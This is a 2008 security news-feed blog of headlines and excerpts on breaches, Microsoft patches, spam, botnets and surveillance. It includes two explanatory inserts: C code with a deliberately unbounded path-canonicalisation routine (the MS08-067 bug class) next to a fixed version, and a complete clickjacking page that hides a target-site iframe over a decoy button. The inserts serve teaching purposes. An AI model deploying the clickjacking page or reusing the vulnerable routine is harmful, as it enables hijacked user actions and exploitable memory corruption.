Wednesday, October 29, 2008

Security News Feed Wednesday 10/29/08

IT security spending not darkened by economic gloom
...In fact, despite the gloomy financial outlook, some analysts actually think IT security spending will increase.

In its annual Global State of Information Security Survey published this month, consultancy PricewaterhouseCoopers (PWC) said the more than 7,000 IT security professionals from 119 countries who responded indicated that 44% would increase their spending on security, while 31% said IT security spending would remain the same, 5% anticipated a decrease and 20% didn't know.

25 Percent Of UK Law Firms Admit To Losing Clients' Electronic Data, By Grey McKenzie

... 37% of lawyers believed that if they did lose their mobile device it would be insecure as a hacker, or identity thief, is “cleverer than the average lawyer” and could access the data it contains. A paltry 13% of those that had lost a mobile device were confident it couldn’t be breached, or used against them, as only this small percentage of law firms were security savvy enough to encrypt the data residing on them.

Former sysadmin sentenced for wrecking corporate servers
A federal judge sentenced him Tuesday to six months in prison, followed by three years of supervised release. Patel has separately agreed to pay Pratt-Read $120,000 in restitution, but he may be ordered to pay additional fines by the judge, prosecutors say.
...
In court filings, prosecutors say that the on the Sunday after Thanksgiving, Patel "had a few drinks," and then accessed the Pratt-Read servers from home...

Ohio gov't. contractor suspected in 'Joe the Plumber' privacy breach

Microsoft vows Windows 7 will fix Vista mistakes
In his speech, Sinofsky said Microsoft is learning its lessons from Vista, which was widely criticized by users and the press, and spoofed famously in television advertisements by Apple Inc.

Hackers publish attack code for last week's Windows bug
October 28, 2008 (Computerworld) Just a day after downplaying the vulnerability that caused it to issue an out-of-cycle patch last week, Microsoft Corp. late yesterday warned customers that exploit code had gone public and is being used in additional attacks.

"We've identified the public availability of exploit code that now shows code execution for the vulnerability addressed by MS08-067," said Mike Reavey, operations manager of Microsoft's Security Response Center, in a post to the MSRC blog Monday evening. "This exploit code has been shown to result in remote code execution on Windows Server 2003, Windows XP, and Windows 2000."
...
Just the day before, another Microsoft employee had downplayed the threat posed by the bug in the Windows Server service that Microsoft patched last week...

Microsoft, Yahoo form alliance to tackle lottery scams

Microsoft: We didn't 'forget' Azure trademark
see http://www.microsoft.com/azure/default.mspx for more info on their "cloud-computing" initiative.

Reputation litigation, here we come!
When Dates Attack October 20, 2008
Dating 'alert' sites allow women to put an 'ex' on trial without rebuttal

Economic Crisis May Be Boon For Cybercriminals, Experts Say October 28, 2008
How the global financial crisis is affecting organized cybercrime

"...Organized cybercrime has already begun capitalizing on the global financial crisis, cybercrime experts say, with targeted phishing attacks on customers whose banks have folded, and attacks that scam consumers who may be shopping less online, but are now spending more time at home.

Why Virtualization Security Is Such a Mess
Audio: Security expert Chris Hoff explains why he believes virtualization is not properly understood and how, as a result, "security in the cloud" is a myth. [Security Insights Podcast with CSO Senior Editor Bill Brenner. Runtime 7 minutes, 45 seconds]

We saw one of these black screens on a legitimate home laptop Monday in the CCC:
Microsoft goes black, making Chinese see red
tech.yahoo.com — An anti-piracy tactic by Microsoft Corp. that turns some computer users' screens black has set off a wave of indignation among Chinese consumers, posing renewed problems for the software maker in the huge China market.

Don't Be Dragooned Into the Botnet Army
A favorite multipurpose weapon of online thieves is growing larger and more powerful, according to those who combat the threat.

McCain Volunteer Invents Attack Hoax, The Nation, October 24, 2008

From Bruce Schneier's blog:
The Skein Hash Function

NIST is holding a competition to replace the SHA family of hash functions, which have been increasingly under attack. (I wrote about an early NIST hash workshop here.)

Skein is our submission (myself and seven others: Niels Ferguson, Stefan Lucks, Doug Whiting, Mihir Bellare, Tadayoshi Kohno, Jon Callas, and Jesse Walker). Here's the paper:

Microsoft Windows Path Canonicalisation Vulnerability

DESCRIPTION:
The vulnerability is caused by an error in netapi32.dll when processing directory traversal character sequences (such as "..\") in path names. It can be exploited to corrupt stack memory by, for example, sending RPC requests containing specially crafted path names to the Server Service component.

Successful exploitation allows execution of arbitrary code; on Windows Vista and Windows Server 2008 it requires authenticated access.

NOTE: The vulnerability is currently being actively exploited.
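As an added illustration of the bug class the advisory describes (teaching code written for this page, not Microsoft's netapi32.dll routine, and not an exploit): a canonicalisation function that collapses "\.." by scanning backwards for the previous separator, shown first without a lower bound on that scan and then with one. Fed more ".." components than real components, the unbounded version drives its write position below the start of its buffer, reads whatever precedes it and copies the next component there (on a stack buffer, that is the caller's frame and saved return address); the bounded version rejects such paths and also checks its output capacity. The input paths are constructed for the example.

```c
/*
 * Added illustration of the MS08-067 bug class: collapsing "\.." by scanning
 * backwards for the previous path separator. Teaching code, not Microsoft's
 * NetpwPathCanonicalize; the input paths are constructed for the example.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SEP '\\'

/* True if the component [s, s+n) is "." or ".."; *dotdot reports which. */
static bool is_dot_component(const char *s, size_t n, bool *dotdot)
{
    *dotdot = (n == 2 && s[0] == '.' && s[1] == '.');
    return *dotdot || (n == 1 && s[0] == '.');
}

/*
 * VULNERABLE: `len` is the write position in `out`. On "..", step back to the
 * previous separator. Nothing stops the scan at index 0, so a path with more
 * ".." than real components drives `len` below zero: the scan reads before
 * `out`, and the next component is copied there. With `out` on the stack that
 * is the caller's frame and saved return address. Never call this on untrusted
 * input; it is here only to be read next to the bounded version below.
 */
static void canonicalize_unbounded(const char *in, char *out)
{
    size_t len = 0;
    const char *p = in;

    while (*p) {
        while (*p == SEP) p++;                 /* skip one or more separators */
        const char *start = p;
        while (*p && *p != SEP) p++;
        size_t n = (size_t)(p - start);
        bool dotdot;
        if (n == 0) break;
        if (is_dot_component(start, n, &dotdot)) {
            if (dotdot) {
                do { len--; } while (out[len] != SEP);  /* BUG: no lower bound */
            }
            continue;
        }
        out[len++] = SEP;
        memcpy(out + len, start, n);
        len += n;
    }
    out[len] = '\0';
}

/*
 * HARDENED: the same routine with three checks the version above lacks:
 *  1. ".." with nothing left to pop (len == 0) is rejected, not scanned,
 *  2. the backward scan stops at index 0,
 *  3. every copy is checked against the capacity (separator + component + NUL).
 * Returns false, with `out` unspecified, when the path is rejected.
 */
static bool canonicalize_bounded(const char *in, char *out, size_t cap)
{
    size_t len = 0;
    const char *p = in;

    if (cap == 0) return false;
    while (*p) {
        while (*p == SEP) p++;
        const char *start = p;
        while (*p && *p != SEP) p++;
        size_t n = (size_t)(p - start);
        bool dotdot;
        if (n == 0) break;
        if (is_dot_component(start, n, &dotdot)) {
            if (dotdot) {
                if (len == 0) return false;          /* ".." above the root: reject */
                do { len--; } while (len > 0 && out[len] != SEP);
            }
            continue;
        }
        if (len + n + 2 > cap) return false;         /* would overflow `out` */
        out[len++] = SEP;
        memcpy(out + len, start, n);
        len += n;
    }
    out[len] = '\0';
    return true;
}

int main(void)
{
    char out[64];
    const char *benign  = "\\share\\docs\\..\\x.txt";   /* constructed */
    const char *hostile = "\\share\\..\\..\\x.txt";     /* constructed: two pops, one component */

    canonicalize_unbounded(benign, out);
    printf("unbounded(benign) = %s\n", out);
    printf("bounded(benign)   = %s\n", canonicalize_bounded(benign, out, sizeof out) ? out : "<rejected>");
    printf("bounded(hostile)  = %s\n", canonicalize_bounded(hostile, out, sizeof out) ? out : "<rejected>");
    /* canonicalize_unbounded(hostile, out) would scan below out[0]: undefined behaviour */
    return 0;
}
```

The unbounded routine is only ever run on the benign path here; the hostile path is handed to the bounded routine, which rejects it at the second "..". The fix is not the reject alone: the `len > 0` bound on the scan and the capacity check matter just as much, because a path that pops exactly to the root and then appends a long component would otherwise pass the first check and still overrun.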

Windows Live ID just became yet another OpenID provider.
... they have undoubtedly put even more weight behind the OpenID initiative.

OpenID is an emerging, de facto standard Web protocol for user authentication. It helps eliminate the need for multiple user names across different Web sites, thereby simplifying a user's online experience. Stated another way, you can reuse your OpenID account at different Web sites without having to create a new user name and password at each site you use.

Microsoft Office will float to the cloud with Office Web
With the upcoming release of Office 14, Microsoft today announced Office Web, a suite of five core Office components that will float up into the clouds.
October 28, 2008 - 02:17PM CT - by David Chartier

Big change in business model:
What Does It Mean For The Christian Science Monitor To Go Web Only?

Turkish hacker arrested by FBI made video giving tips for installing ATM skimmers
Paul Fisher October 28, 2008
A Turkish hacker known as "Chao", arrested as part of the FBI operation against the underground forum DarkMarket, produced his own training videos.

Security group: Vulnerability disclosure is impractical
Mark Mayne October 29, 2008
An advisory group contends that the scramble over Dan Kaminsky's DNS flaw discovery proves that full disclosure is simply not feasible.

Monday, October 27, 2008

Security News Feed Monday 10/27/08

Lots to go over today. First up: Clickjacking is fixed with the latest Adobe Flash (10.0). Upgrade ASAP!

Scary - weakness in Microsoft making Cisco vulnerable in some cases:
http://www.cisco.com/en/US/products/products_security_advisory09186a0080a183ba.shtml

October 27, 2008 Recent Stock Market Decline Causes Economic Cybercrime to Hit All Time High, According to PandaLabs
http://www.crime-research.org/news/27.10.2008/3641/

Tech Insight: Digital Forensics & Incident Response Go Live - 10/24/2008 3:45:00 PM

'Block the Vote' Tactics Go Online This Election - 10/22/2008 3:45:00 PM
Electronic Privacy Information Center predicts potential for spoofed Websites, fake VOIP call blasts, phishing, and DOS – to suppress voters

Microsoft Blue Hat: Researcher Demos No-Hack Attack - 10/21/2008 4:22:00 PM
Wealth of available online data on individuals, businesses can be used in targeted attacks

How To Save Yourself From Your Kids Online
Security expert Richard B. Lawhorn writes that as parents, we must adapt to new technologies our children are using, including those found on the Internet.

How to Prevent Cyber Espionage
Security expert Gadi Evron has plenty of experience helping governments fight cyber attacks. In this column, he offers a roadmap companies can use to prevent computer espionage.

Homeland Security Clears Secure Flight but Watchlists Remain
The Department of Homeland Security announced today the Final Regulations for the Secure Flight program. All airlines will now be required to collect date of birth and gender from customers and provide this information to the TSA for watchlist verification. A DHS Redress number, if previously issued, would also be collected. EPIC has warned in Congressional testimony that accuracy problems will continue to plague Secure Flight unless passengers are able to challenge the government's watchlist determinations. EPIC also recommended that the redress procedures be modified to limit data collection and to prescribe penalties for Privacy Act violations.
Posted by EPIC on October 22, 2008.

Sharepoint Data Security Risks
by Jesper M. Christensen
The challenges of securing data on Microsoft SharePoint sites, lists, pages and the information made available through data-links to backend systems (through BDC and manually created data-links).

Microsoft has head in the clouds with new Windows Azure OS
As expected, Microsoft announced a Windows-based "cloud OS" during the first day of PDC. Windows Azure offers virtualized computing, automated service management, and scalable storage and will compete against cloud-based offerings from Amazon and Google.
October 27, 2008 - 12:28PM CT - by Kurt Mackey

More News from Rustock, October 23, 2008
Rustock has now come up with another spamming template using CBS News.

Other Tools Terrorists Might Use: Voice, Pencils, Fax Machines, Email, Mobile Phones, Etc.

US Customs Agents Can Search Letters at Airports
SAN FRANCISCO (CN) - The 9th Circuit upheld the right of U.S. Customs and Border Patrol agents to search an elderly man's FedEx package at an international airport, and to open and read letters containing sexually suggestive language apparently addressed to an 8-year-old Filipino girl.

Penn hacker sentenced, avoids child porn charges AP - Wed Oct 22, 4:17 AM ET
PHILADELPHIA - A federal judge questioned why a white Ivy League student found during a computer hacking probe with thousands of images of child pornography was not charged with that crime, sparing him a decade-long prison sentence that a black convicted child pornographer faced at the same hearing.

Study: Malware risks are growing exponentially CNET - Tue Oct 21, 8:02 PM ET
A new report from security services provider ScanSafe finds that companies are at increasing risk of having employees inadvertently download backdoors and password stealers onto corporate computers from Web sites that have malicious software hidden on them.

Treasury office faults IRS computer security AP - Thu Oct 16, 1:06 PM ET
WASHINGTON - Two new IRS computer systems that will eventually cost taxpayers almost $2 billion are being put into service despite known security and privacy vulnerabilities, a Treasury watchdog said in a report coming out Thursday.

AVG flags ZoneAlarm as malware CNET - Wed Oct 15, 6:37 PM ET
This post was updated at 3:30 p.m. PDT with comment from Check Point.

Al-Qaeda-Affiliated Online Forums Discuss High Tech Tools For Cyber Terror By Grey McKenzie

FBI Busts Dark Market Internet Cyber Crime Website Trafficking In Stolen Financial Data By Grey McKenzie 10/22/2008

New European data protection rules likely years away
Europe's data-protection regulatory framework needs updating, but it will be two to three years...

Researchers find problems with RFID passport cards
RFID tags used in two new types of border-crossing documents in the U.S. are vulnerable to snooping...

Separate proofs-of-concept released after rushed Windows fix
Dan Kaplan October 24, 2008
Public and private proof-of-concept code has emerged for the gaping Windows hole plugged by Microsoft on Thursday in an emergency update.

China's internet users lash out at Microsoft's anti-piracy system
Dan Raywood October 24, 2008
Chinese internet users have criticized what they deem to be Microsoft's violation of their right to privacy.

Android vulnerable to drive-by exploit

McAfee antes up against cybercrime, News Brief, 2008-10-22
The security firm calls for more action from authorities, creates a cybercrime response unit and advisory council, and will hand out grants to anti-crime organizations.

Java Update Promises to Remove Older Versions
Sun Microsystems has released another version of its Java software client. The update, JRE6 Update 10, contains no new security fixes to the most recent version, JRE6 Update 7, but it does appear to fulfill a promise the company made long ago to stop littering users' PCs with outdated, insecure versions of the software.
http://voices.washingtonpost.com/securityfix/2008/10/java_update_promises_to_remove.html

Gimmiv worm feeds on latest Microsoft bug

Most common questions that we've been asked regarding MS08-067
Since the release we have received several great questions regarding MS08-067 (http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx), thus we decided to compile answers for them. We still want to encourage everyone to apply the update.

Can the vulnerability be reached through RPC over HTTP?

No, the vulnerability cannot be reached through RPC over HTTP. RPC over HTTP is an end-to-end protocol that has three roles: client, proxy and server. To be clear, this is different from standard RPC, and the two protocols do not interoperate. Moreover, the only way to hit the vulnerable code is through named pipes, so the Interface security callback will drop the connection when connecting through TCP/IP.

Using Outlook to connect to an Exchange server to access e-mail is a common scenario that uses RPC over HTTP; since the RPC over HTTP proxy is used the Exchange server is not exposed to external attacks.

Further information about RPC over HTTP:
http://msdn.microsoft.com/en-us/library/aa375384.aspx
Further information about using Exchange with RPC over HTTP:
http://technet.microsoft.com/en-us/library/aa996072(EXCHG.65).aspx

Wednesday, October 15, 2008

Security News Feed Wednesday 10/15/08

Update: Cisco Security Advisory: Multiple Multicast Vulnerabilities in Cisco IOS Software

Yesterday's Microsoft security bulletins are as follows:

MS08-056 Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)

MS08-057 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)

MS08-058 Cumulative Security Update for Internet Explorer (956390)

MS08-059 Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)

MS08-060 Vulnerability in Active Directory Could Allow Remote Code Execution (957280)

MS08-061 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)

MS08-062 Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)

MS08-063 Vulnerability in SMB Could Allow Remote Code Execution (957095)

MS08-064 Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)

MS08-065 Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)

MS08-066 Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)

Advisory 956391 Cumulative Security Update of ActiveX Kill Bits

FBI: Several nations eye U.S. cybertargets
But FBI official stresses need to protect networks rather than finding source of cyberthreats.

October 15, 2008 (IDG News Service) About two dozen nations have developed cyberattack capabilities and have their eyes on targets inside the U.S. government or businesses, the top cybercrime law enforcement official in the U.S. said today.

"There are countries who have an interest in obtaining information from the U.S., in terms of the electronic theft of data," said Shawn Henry, the assistant director in charge of the FBI's Cyber Division.

FTC, New Zealand hit one of world's largest spam operations
October 15, 2008 (IDG News Service) Government agencies in the U.S. and New Zealand say they have sued the people behind one of the world's largest spamming operations.

The lawsuits were filed in federal court in Illinois and New Zealand High Court in Christchurch over the past week. They describe an international spamming operation run out of New Zealand, Australia and the U.S. that sold the kinds of phony male-enhancement pills, knock-off prescription drugs, sex toys and replica watches that have gummed up e-mail in-boxes for years.

Ex-hacker 'Mafiaboy' tells all in memoir
http://www.crime-research.org/news/14.10.2008/3625/
A former hacker, who temporarily shut down several major websites and led the RCMP and the FBI on a manhunt when he was 15, has written a tell-all memoir about his criminal past.

Microsoft issues mega-patch to crush 20 bugs in Windows, Office, IE

Patch releases push down Microsoft's stock, researcher says

Bush signs PRO-IP antipiracy law

Intellectual Property Bill Becomes Law: Critics Say It Goes Too Far - 10/14/2008 5:54:00 PM
New law gives authorities more leeway to prosecute thieves who steal sensitive data for piracy or espionage

Tough economic climate can heighten insider threat

'Experimental' security fix is malware, Microsoft says

Anonymous Proxy Servers: Necessary Or Evil?
Some security experts believe anonymous proxy servers are only necessary if you're up to no good, while others see them as a legitimate tool for research, pen testing and the like. Who's right?

Radiohead Reveal Success of 'In Rainbows' Download
nme.com — The statistics behind the pay-what-you-like release of Radiohead's 'In Rainbows' album, released on October 10 last year online, have been revealed today.

"...Warner Chappell concluded that the new release style was a financial success, but did not reveal whether Radiohead plan to release an album in a similar way in the future."

Teacher's Boozy MySpace Scotches Job

Four Security Lessons From the World Bank Breach
The World Bank is making headlines after a disputed report claims hackers managed to access their secure network for over a year. One security pro offers takeaways that everyone can learn from the breach.

"...The problem is, no matter how much technology you put in place there is always this human element," he said. "Humans can't be upgraded with new patches. But it's humans who are making mistakes and bad decisions which will often introduce security problems into organizations."

NSA's Warrantless Eavesdropping Targets Innocent Americans
Remember when the U.S. government said it was only spying on terrorists? Anyone with any common sense knew it was lying -- power without oversight is always abused -- but even I didn't think it was this bad:

Faulk says he and others in his section of the NSA facility at Fort Gordon routinely shared salacious or tantalizing phone calls that had been intercepted, alerting office mates to certain time codes of "cuts" that were available on each operator's computer.

"Hey, check this out," Faulk says he would be told, "there's good phone sex or there's some pillow talk, pull up this call, it's really funny, go check it out. It would be some colonel making pillow talk and we would say, 'Wow, this was crazy'," Faulk told ABC News.

Warrants are a security device. They protect us against government abuse of power.
Posted on October 15, 2008 at 12:39 PM

Insiders dodge security for productivity, RSA says, News Brief, 2008-10-15
In its latest survey of IT workers, the company finds that more than half found ways to work around security policies to get their work done.

...preliminary investigations into a Qantas Airbus A330 mishap where 51 passengers were injured has concluded that it was due to the Air Data Inertial Reference System feeding incorrect information into the flight control system — not interference from passenger electronics, as Qantas had initially claimed.

Microsoft aims for Vista SP2 before Win 7
Mary Jo Foley: The Windows team is readying second service packs (SP2) for Vista--and for its server complement, Windows Server 2008--and is aiming to deliver these SP2s before it releases Windows 7.

Clickjacking
Lately, the topic of clickjacking has gained popularity in discussions on the internet. It is a new type of web attack. I decided to find out what it’s all about.

I found an online video of OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman & Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits –ClickJacking”. I also found a demo of this vulnerability here.

In the videos they describe only parts of the vulnerability, but it is enough for us to have a basic idea of what clickjacking is.

To explain this, let's use an example. You have a web page A controlled by an attacker. A contains an element B, typically an iframe that loads a page from the site being attacked. In a clickjacking attack, B is made transparent via CSS and its z-index is set higher than that of the other elements of page A; B is also sized and positioned so that the control the attacker wants clicked sits exactly where the user's mouse will be. The attacker then places visible decoy buttons on page A at the same positions as the buttons in B. When the user clicks a decoy button on page A, the click actually lands on the button in B, because B's layer sits above A's. Since B is an ordinary frame of the target site, the click is made with whatever session the user already has there. The attack uses only HTML and CSS (DHTML) and does not require JavaScript, so disabling JavaScript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich media internet application today. Adobe has released a security advisory and provided a workaround.
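The layout described above, as an added example that is not from the original post or from the presentation it cites: an attacker page A with a visible decoy button and, stacked over it at a higher z-index with opacity 0, an iframe B loading a page from the site being attacked. The framed URL, the pixel offsets and the button labels are hypothetical; in a real attack the offsets are tuned so that the target page's button (assumed here to be a "Confirm" control at a known position) lands exactly under the decoy.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Page A (attacker-controlled)</title>
<style>
  /* B: the target site, framed. Invisible to the user but on top of the stack,
     so it is what actually receives the click. No script is needed. */
  #b {
    position: absolute;
    top: -250px;           /* hypothetical: shifts the target's Confirm button to (120px, 300px) */
    left: -80px;
    width: 1200px;
    height: 900px;
    border: 0;
    opacity: 0;            /* fully transparent; older engines: filter: alpha(opacity=0) */
    z-index: 2;            /* above the decoy */
  }
  /* The decoy the user believes they are clicking, placed exactly where the
     target's button sits in the frame above. */
  #decoy {
    position: absolute;
    top: 300px;
    left: 120px;
    z-index: 1;            /* below B */
  }
</style>
</head>
<body>
  <p>Congratulations, you have won. Click below to claim your prize.</p>
  <button id="decoy">Claim prize</button>
  <!-- hypothetical target: a page whose Confirm button performs a one-click action -->
  <iframe id="b" src="https://target.example/settings/confirm" scrolling="no"></iframe>
</body>
</html>
```

Opening this file in a browser and clicking the decoy delivers the click to the framed page at the point under the cursor while the user sees only page A. The frame is a normal request to the target site, so it carries the user's existing cookies, which is what makes the click worth stealing.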

Cybersting: FBI ran DarkMarket forum to catch cybercriminals
Angela Moscaritolo October 14, 2008
The FBI used the DarkMarket.ws cybercriminal forum to create profiles of identity thieves looking to share tips and purchase stolen data.

More than 5,000 pirated eBay credentials found on web
Dan Kaplan October 14, 2008
A security researcher has discovered a loot of eBay credentials on a Google cache.

Frame injection exploits Google flaw
Angela Moscaritolo October 13, 2008
The login page for Google Mail can be spoofed so that an attacker can steal a user's credentials.

FBI sees rise in computer crime, Reuters
WASHINGTON (Reuters) - Computer spying and theft of personal information have risen notably in the past year, costing tens of millions of dollars and threatening U.S. security, the FBI's cyber division head said on Wednesday.

30 Million Computers are Infected by Fake Antivirus Programs Generating Nearly $14 Million for Cyber-crooks By Grey McKenzie

Three potential scenarios for the future of identity federation
I spent a day last week with SURFnet. And, no, SURFnet has nothing to do with Moondoggie, Gidget,...

Monday, October 13, 2008

Security News Feed Monday 10/13/08

Cost-cutting, greater efficiencies to be topics at SNW

Report: World Bank servers breached repeatedly
World Bank Hacked, Sensitive Data Exposed - 10/10/2008 5:10:00 PM
Hacked Web servers, a stolen administrative account, and lot of unanswered questions

Google allies with click-fraud-detection firm Click Forensics

Why some security pros hate SharePoint

Exploit code loose for six-month-old Windows bug

Over half of U.K. firms have lost data

U.S. proposes digital signing of DNS root zone file
Security experts for years have advocated the adoption of DNSSEC, but implementation has been patchy. The U.S. government has said it will use DNSSEC for its .gov domain. Country-code top-level domain operators in Sweden (.se), Brazil (.br), Puerto Rico (.pr) and Bulgaria (.bg) are also using DNSSEC. The operator of the .org TLD has also committed to the system, according to the Commerce Department.

Data Center Security Tools to Not Overlook
Endpoint technologies and virtualization software get a lot of ink these days, but here's a quick look at five other key security areas addressed by data-center tools.
Can you say "next year's budget?"

Fewer People Downloading Music Illegally
telegraph.co.uk — Fewer people are downloading music from the internet illegally because they are frightened about having their connections cut off, according to new research.

Oct 12, 9:05 am: Six Essential Apple iPhone Security Tips
Security is a tech manager's top concern when it comes to mobile devices--here's how to use them to your advantage with minimal risk.

Oct 11, 2:18 pm: Vendors, Cops, Profs Team to Study Cybercrime
Tech vendors and the Secret Service are among those working with an evaluation of trends and best practices for security.

Oct 11, 6:00 am: Microsoft Readies Flood of Patches
The 11 patches include 4 critical fixes, plus updates to Windows, Office, and IE.

The National Debt Counter, erected in 1989 when the U.S. debt was 'merely' a tiny $2.7 trillion, has been moving so much that it recently ran out of digits to display the ballooning figure: $10,150,603,734,720, or roughly $10.2 trillion, as of Saturday afternoon. To accommodate the extra '1,' the clock was hacked: the '1' from "$10.2" has been moved left to the LCD square once occupied solely by the digital dollar sign. A non-digital, improvised dollar sign has been pasted next to the '1.' It will be replaced in 2009 with a new clock able to track debt up to a quadrillion dollars, which is a '1' followed by 15 zeros.

Goodbye Storm?
Spam from the Storm botnet has dried up. Is this the end of Storm?
October 10, 2008
The former king of spam, and perhaps the most discussed and studied botnet ever, seems to have gone away. Spam originating from the Storm botnet suddenly dried up in mid-September. Since that time we have not detected a single Storm spam in our traps.

The folks at sudosecure.net have also noticed the Storm subsidence, observing that surviving storm bot peers still communicate with each other, but that certain Storm hosts simply answer with "Go away, we're not home".

At its peak in mid 2007, we estimated Storm was responsible for some 20% of all spam. Storm’s spam attacks were high profile and distinctive. Its peer-to-peer communication model was revolutionary and it was quick to use fast flux (rapidly changing DNS) to hide its hosts. However, following all the attention, and the targeting of Storm by Microsoft with its Malicious Software Removal Tool in September 2007 where some 280,000 PCs were cleaned in one hit, Storm became a much less effective beast.

So is this the end of Storm? Certainly, as a spam generator it has been a minor player for the best part of a year now, with other botnets namely Srizbi, Rustock, Pushdo, and Mega-D taking over as the spam heavies. Perhaps Storm is now obsolete, having been supplanted by a better botnet. Or maybe Storm’s owners are sitting back, avoiding attention and redesigning aspects of their creation. Only time will tell.

The Rise Of Anti-Spam Lawsuit Entrepreneurs

Cracking CAPTCHA: Another Russian Business

Fake Microsoft email contains "backdoor" virus
Angela Moscaritolo October 10, 2008
A fake email making the rounds seemingly comes from Microsoft, but actually contains a trojan.

Product review: PGP Whole Disk Encryption 9.9
October 04, 2008, 5 out of 5 stars

Inside Operation Highlander: the NSA's Wiretapping of Americans Abroad
A top secret NSA wiretapping facility in Georgia accused of spying on Americans illegally was hastily staffed with inexperienced reservists in the months following September 11, where they worked under conflicting orders and with little supervision, according to three former workers at the spy complex.

"Nobody knew exactly what the heck we were doing," said a former translator for the project, code named Highlander, who spoke on condition of anonymity. "We were figuring out the rules as we were going along."

Chinese hackers gain access to World Bank
At least there seems to be evidence that two of the six major attacks originated from IP addresses inside of China

How to Hack RFID-enabled Credit Cards for $8
Published 10/6/2008
http://www.nationalcybersecurity.com/

Mixing in information protection
The perimeter might not be dead, but it needs a lot of help. Here's how to secure critical and regulated data when network defenses aren't enough.

Friday, October 10, 2008

Security News Feed Friday 10/10/08

Windows 7 UAC, the Evolution

Microsoft investigates exploit reports for Windows flaw
Dan Kaplan October 10, 2008
Attackers have posted public exploit code for a zero-day Windows vulnerability that could result in privilege escalation.

Microsoft set to deliver 11 patches next week
Dan Kaplan October 09, 2008
Microsoft on Thursday announced plans to push out 11 fixes in next week's security update.

Iowa ISP owner wins $236 million spam judgment
Dan Kaplan October 09, 2008
The owner of a small Iowan ISP has been battling spammers for years. His most recent victory came in the form of a $236 million judgment.

10,000 LinkedIn users targeted in spear phishing attack
Angela Moscaritolo October 09, 2008
A LinkedIn "spear phishing" email scam loaded malicious software to steal usernames and passwords.

Prices for stolen information plummet
Dan Raywood October 09, 2008
The black-market price for stolen credit and debit card details has dropped to as little as $1.50, according to a newspaper investigation.

Mac OS X Patch Day: 40 security flaws fixed
Ryan Naraine: Apple has shipped another whopper of a patch to cover a total of 40 documented vulnerabilities affecting the Mac OS X ecosystem.

NSA Abused Wiretap Rights: Intercepted, Shared Private Calls Of Americans
from the funny-how-that-works dept

American Citizen Detained At Border Due To Drawing Of An SUV
from the think-how-much-worse-it-could-be dept
If you want to understand why we're so troubled by the ACTA treaty that many nations are working on in secret, we just need to look at a story highlighted recently at Boing Boing about an American woman who was detained for a while at the US-Canadian border because she had a drawing of an SUV. The customs officials accused her of being an industrial spy and copyright infringer. In actuality, she's a professor and artist, who was doing an art project involving an SUV.

Cyber Credit Card Thieves Payment Processor of Choice is Western Union By Grey McKenzie 10/7/2008

Free Cyber Security Awareness Materials From ISC By Grey McKenzie 10/7/2008

Romanian pleads guilty to phishing-related charges
A Romanian man pleaded guilty earlier this week to charges related to possession of stolen credit...

U.S. gov't proposes digital signing of DNS root zone file
The U.S. government is soliciting input on a way to make the Internet's addressing system less...

Saudi-owned TV website hit by cyber attack, AFP
DUBAI (AFP) - Computer hackers claiming to be Shiite shut down the website of Saudi-owned satellite channel Al-Arabiya on Friday, a month after Iran reported similar attacks on many of its websites by hardline Sunnis.

Update 1: Microsoft Security Advisory 951306
Posted Thursday, October 09, 2008 4:00 PM by MSRCTEAM
Hello, Bill here,
I wanted to let you know that we have just updated Microsoft Security Advisory (951306).
Exploit code has been published on the Internet for the vulnerability addressed by this Advisory. Our investigation has shown that it does not affect customers who have applied the workarounds listed in the Advisory.

Remote Workers Care About IT Security -- Really
A new survey finds that mobile users actually do make sure to use secure Internet and Wi-Fi connections, they love IT for helping keep them on the go, and they'd rather live without their car than Internet connectivity.

Fake Microsoft Update Email

When the Hackers Hack Back

Data Mining for Terrorists Doesn't Work
According to a massive report from the National Research Council, data mining for terrorists doesn't work.

CUPS Multiple Vulnerabilities
Issued 10 hours ago. // Moderately critical // From local network
Some vulnerabilities have been reported in CUPS, which potentially can be exploited by malicious people to compromise a vulnerable system.

Posted at 01:33 PM ET, 10/ 9/2008
Spam Volumes Plummet After Atrivo Shutdown
Security Fix has spilled quite a bit of digital ink chronicling the demise of Atrivo (a.k.a. "Intercage"), a now-defunct Northern Calif. based Internet service provider that served as home base for a large number of cyber criminal operations. Happily, data released this week about a short-lived but precipitous decline in the level of badness online after Atrivo was shut down illustrates just how bad Atrivo was.
Posted by Brian Krebs

Interorganizational wrangling begins as .gov studies DNS fix
In the wake of recent DNS hijacking hacks, a number of top-level Internet domains have deployed DNSSEC. Now, the US Commerce Department is requesting comments on proposals to roll it out for the root DNS servers.
October 09, 2008 - 12:48PM CT - by John Timmer

Users, Enterprises Pay for Poor Privacy Policies, Study Says - 10/7/2008 4:10:00 PM
Research paper seeks to quantify loss of time spent reading confusing, overwritten privacy policies

Wednesday, October 8, 2008

Security News Feed Wednesday 10/08/08

Great write-up on Capture-the-Flag event across three nights at a recent convention. Written up by one of the guys from Pauldotcom.com security podcast.
http://pauldotcom.com/2008/10/ice2-games-lessons-learned-fro.html

Palin email intruder indicted, faces up to five years in prison
Dan Kaplan October 08, 2008
A 20-year-old Tennessee man has been indicted on charges he accessed GOP vice presidential candidate Sarah Palin's Yahoo email account without permission.

China's Eye on Web Chatter
By Erica Naone, Monday, October 06, 2008
Poorly protected files reveal a massive surveillance scheme.

China’s Cyber Police Map (with links)
(Cool map at the site of China's web police locations)
Recently I’ve been interested in China’s Cyber Police and how they function. Nothing worth sharing yet, but some of our readers are Chinese linguists and might find this map and links to cyber police websites interesting.

